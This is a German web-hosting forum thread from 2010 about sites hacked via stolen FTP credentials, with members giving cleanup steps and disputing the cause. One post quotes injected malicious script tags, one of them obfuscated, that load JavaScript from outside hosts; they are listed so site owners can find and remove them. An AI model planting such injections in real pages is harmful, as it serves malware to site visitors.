Forum Partner+Friends LinkUs Downloads KNW Suche TS³ Viewer Twitter Facebook

Angriff auf versch. Webseiten (via FTP)

Jetzt kostenlos Anmelden!


DJ Sebi Männlich

ist gerade angekommen

Beiträge: 7

Geschlecht: Männlich

Wohnort: Helmstedt

PHPKIT Version: 1.6.1

91

Samstag, 26. Juni 2010, 15:06

ok mein phpbb3 forum hats auch erwischt.
ClubNature.FM - The Sound of the Future ::: Online Radio
Dance, HandsUP, Trance, Jumpstyle, Techno & Hardstyle
  • Zum Seitenanfang
  • Zum Seitenende

Sumale.nin

unregistriert

92

Samstag, 26. Juni 2010, 16:11

Kleine Zusammung (Behebung)

Hier mal eine kleine Zusammenfassung, wie man den Mist entfernen kann:

  • Ladet euch Notepad++ oder Weaverslave
  • Ladet nun alle Dateien von eurem FTP herunter
  • In beiden Programme mit STRG+F drücken (Es öffnet sich das Suchfenster) *Bei ersetzen = Nichts hineinschreiben*
  • Hauptsächlich sind index.php, index.htm oder html betroffen desweiteren bei manchen noch die default.php, main.php und soweit bekannt alle *.js Dateien
  • Danach alles wieder aufspielen und Passwörter ändern ( DB nicht vergessen )
Nach folgenden Code muss gesucht werden und im anschluss direkt entfernen

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://inc.chubbyblondebabes.com/HDTV.js"></script>

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://inc.chubbyblondebabes.com

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://inc.chubbyblondebabes.com/GUI.js"></script>

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://gooaogioy.owensomebody.com:8080/Page_View.js"></script>

Javascript-Quelltext

 
1

document.write('<s'+'cript type="text/javascript" src="http://inc.chubbyblondebabes.com/Beta_Software.js"></scr'+'ipt>');

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://sakora.apntelecom.com:8080/Virus.js"></script>

Javascript-Quelltext

 
1

<script type="text/javascript" src="http://sakora.apntelecom.com:8080/HACKED.js"></script>


Das sind die Codes die bisher bekannt waren.

Weitere Security Vorschläge:
  • Falls ihr Firefox nutzt, laded Euch das Addon NoScript herunter und sperrt über dieses den Gebrauch von Javascript aus um Euch erstmal selbst zu schützen
  • Wenn Ihr automatische Backups generieren lasst, dann passt auf, dass Ihr nicht die Schädlinge mit absichert
  • unterschiedliche FTP Benutzer für den Webspace einteilen
  • IMMER längere Passwörter als 8 Zeichen verwenden, um kein Bruteforce-Opfer zu werden
  • Kontrolliert Euern Server auf offene Ports
  • Im Taskmanager sehen, ob dort ein unbekanntes Programm läuft (nciht, dass Ihr Euch nen Keylogger eingefangen habt - würde das Prob mit den Passwörtern erklären)

[size=24]Ps.: Ich glaube diese hier sind Passwörter[/size]

Post #43

Zitat

<!--5c03f1d4815e48eef7004ae5ec0a95ad-->
Post #44

Zitat

<!--2e84f33d75cac544f33df85d4b9768d5-->
  • Zum Seitenanfang
  • Zum Seitenende

TS-Jan

unregistriert

93

Samstag, 26. Juni 2010, 22:31

Ist ja wirklich stark, dass es auf einmal so vermehrt auftritt. Mich würde einmal interessieren, welche PHP-Version alle eingesetzt haben, denn ich sehe nicht wirklich einen Zusammenhang darin, weshalb so verschiedene Anbieter zur gleichen Zeit und vom gleichen Script betroffen waren.

Ferner gibt es ja anscheinend nichts in den Logs, welches auf einen Fehler hinweisen würde. Jetzt gibt es bei all-inkl auch eine Log-Funktion, die den FTP-Zugriff aufzeichnet. Hat man in diese Logs einmal hineingesehen, ob vielleicht von dort jemand etwas verändert hat? Die FTP-Log-Funktion ist nämlich standardmäßig im KAS aktiviert.
  • Zum Seitenanfang
  • Zum Seitenende

reddevil82 Männlich

BFM Stream Cheffe

Beiträge: 1 712

Geschlecht: Männlich

PHPKIT Version: 1.6.5

94

Samstag, 26. Juni 2010, 23:21

Headless hat meine FTP Logs bereits überprüft er kann dazu mehr sagen.
Seit 02.07.2010 Papa einer süssen Tocher !!!!

http://www.burnerfm.de

Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.
  • Zum Seitenanfang
  • Zum Seitenende

"Sascha" Männlich

"HellBoY the KiT"

Beiträge: 492

Geschlecht: Männlich

Wohnort: 63263 Neu-Isenburg

PHPKIT Version: 1.6.5

95

Sonntag, 27. Juni 2010, 13:53

Oh Benny Post 92 ist totaler Quack


OffTopic
Wenn man keine Ahnung hat einfach mal fresse halten


Es liegt daran das man sich ein Trojaner eingefagen hat der ftp zugänge weiter sendet.

Als wichtiges ist sein rechner auf Trojaner überprüfen und bereinigen.
Dann Daten vom FTP runterladen.
Dann neue FTP Zugänge anlegen auch alle die FTP Zugang zur seite haben müssen des machen also 5 Webmaster haben zugänge die müssen schritt 1 auch machen.
mit bekannten Editoren N++ und WS in den bekannten datein nach den scripten suchen und diese entfernen.
DB zugänge brauchen NICHT geändert werden. (Dieses Thema dreht sich nur um FTP) könnt ihr aber trotzdem machen schadet nicht ist aber nicht dringend notwnendig.
sauber datein wieder aufspielen fertig.

Und es war gefragt um welche Systeme es sich handelt es können alle systeme betroffen sein ob PHPKIT 1603-165, WBB PHPBB usw hat nichts mit dem System zu tun noch mal es handelt sich um ein Trojaner der FTP zugänge weiter gibt.

Warum können gäste hier so ein Quatsch Posten (Nr.92)???
  • Zum Seitenanfang
  • Zum Seitenende

-=LCL=-|BuLLeT| Männlich

#1.6.1 - still alive #

Beiträge: 1 356

Geschlecht: Männlich

Wohnort: Leipzig

PHPKIT Version: 1.6.1

96

Sonntag, 27. Juni 2010, 21:06

Zitat von »"Sascha"«


Warum können gäste hier so ein Quatsch Posten (Nr.92)???



kann ich dir sagen, der account ist nicht mehr vorhanden. daher wird aus dem user ein gast.
der werte herr hat nun einen neuen account hier.
  • Zum Seitenanfang
  • Zum Seitenende

Sumale.nin Männlich

postet ab und an hier

Beiträge: 213

Geschlecht: Männlich

Wohnort: Essen

PHPKIT Version: 1.6.5

97

Sonntag, 27. Juni 2010, 21:49

Zitat

Oh Benny Post 92 ist totaler Quack


OffTopic
Wenn man keine Ahnung hat einfach mal fresse halten


Warum ist das Quark? Den Quark habt ihr doch (ja du auch) selber geschrieben ich habe es nur zusammengefasstt weil ich dachte das es übersichtlich wäre. Und zu dem Offtopic, dass gebe ich gerne an dich weiter und zwar darum:

Zitat

Warum können gäste hier so ein Quatsch Posten (Nr.92)???


OffTopic
Wenn man keine Ahnung hat einfach mal fresse halten
:thumbsup:


Zitat von »-=LCL=-|BuLLeT|«

Zitat


Warum können gäste hier so ein Quatsch Posten (Nr.92)???



kann ich dir sagen, der account ist nicht mehr vorhanden. daher wird aus dem user ein gast.
der werte herr hat nun einen neuen account hier.
Ja, weil ich vergaß das mein Account auf Löschung stand... nun habe ich mir den Account wieder erstellt!
  • Zum Seitenanfang
  • Zum Seitenende

-=LCL=-|BuLLeT| Männlich

#1.6.1 - still alive #

Beiträge: 1 356

Geschlecht: Männlich

Wohnort: Leipzig

PHPKIT Version: 1.6.1

98

Sonntag, 27. Juni 2010, 22:25

*btt*

sonst

*tc*
  • Zum Seitenanfang
  • Zum Seitenende

Sumale.nin Männlich

postet ab und an hier

Beiträge: 213

Geschlecht: Männlich

Wohnort: Essen

PHPKIT Version: 1.6.5

99

Sonntag, 27. Juni 2010, 23:32


OffTopic
Ich habe net angefangen :P


Es gibt aber immernoch keine 99% SIcherheit oder?
  • Zum Seitenanfang
  • Zum Seitenende

Ähnliche Themen